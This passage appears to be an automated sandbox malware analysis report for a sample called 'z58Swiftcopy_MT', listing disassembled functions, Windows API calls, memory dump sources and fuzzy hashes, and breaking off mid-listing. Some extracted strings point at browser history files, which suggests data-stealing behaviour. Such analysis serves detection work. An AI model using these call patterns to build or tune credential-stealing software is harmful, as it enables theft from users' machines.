                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00AA6DA8), ref: 0044DF21
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(02260458), ref: 0044DF31
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??3@
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                                                                                                      • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                                                                      • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                                                                                                                                                      Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                                      • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                                                                                                      • API String ID: 2221118986-1725073988
                                                                                                                                                                                                                                      • Opcode ID: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                                                                                                                                                                                      • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                                                                                                                                      Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,00412966,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004125C3
                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??3@DeleteObject
                                                                                                                                                                                                                                      • String ID: r!A
                                                                                                                                                                                                                                      • API String ID: 1103273653-628097481
                                                                                                                                                                                                                                      • Opcode ID: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                                                                                                                                                                                                      • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                                                                                                                                                      Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1033339047-0
                                                                                                                                                                                                                                      • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                                                                      • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                                                                                                                                      Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$memcmp
                                                                                                                                                                                                                                      • String ID: $$8
                                                                                                                                                                                                                                      • API String ID: 2808797137-435121686
                                                                                                                                                                                                                                      • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                                                                      • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                                                                                                                                                      Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                                                        • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                                                        • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                                                        • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                                                        • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                                                        • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                                                        • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                                                        • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                                                                        • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                                                                      • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                                                                                                                                                        • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                                                                                                                                        • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                                                                        • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,762D2EE0), ref: 0040E3EC
                                                                                                                                                                                                                                      • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                                                                                                                                                        • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                                                                        • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                                                                        • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1979745280-0
                                                                                                                                                                                                                                      • Opcode ID: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                                                                                                                                                                                      • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                                                                                                                                                      Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                                                                        • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                                                                        • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                                                                                                                                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                                                      • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                                                                                                                                      • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                                                                                                                                      • free.MSVCRT ref: 00418803
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1355100292-0
                                                                                                                                                                                                                                      • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                                                                                                                      • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                                                                                                                                      Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                                                                                                                                        • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                                                                        • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                                                                        • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403A55
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                                                                                                                                                      • String ID: history.dat$places.sqlite
                                                                                                                                                                                                                                      • API String ID: 2641622041-467022611
                                                                                                                                                                                                                                      • Opcode ID: 4ee3c1f855ed567974f8c38ae52f347571c4e2ef0f255528624b3fdde4aab0c5
                                                                                                                                                                                                                                      • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4ee3c1f855ed567974f8c38ae52f347571c4e2ef0f255528624b3fdde4aab0c5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                                                                                                                                                      Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                                                        • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                                                        • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                                                      • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00417627
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast$File$PointerRead
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 839530781-0
                                                                                                                                                                                                                                      • Opcode ID: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                                                                                                                                                                                                      • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                                                                                                                                      Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFindFirst
                                                                                                                                                                                                                                      • String ID: *.*$index.dat
                                                                                                                                                                                                                                      • API String ID: 1974802433-2863569691
                                                                                                                                                                                                                                      • Opcode ID: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                                                                                                                                                                                      • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                                                                                                                                      Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast$FilePointer
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1156039329-0
                                                                                                                                                                                                                                      • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                                                                      • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                                                                                                                                      Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                                                                      • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                                                      • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$CloseCreateHandleTime
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3397143404-0
                                                                                                                                                                                                                                      • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                                                                      • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                                                                                                                                      Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                                                      • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1125800050-0
                                                                                                                                                                                                                                      • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                                                                      • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                                                                                                                                      Function 004175B7 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 004175D0
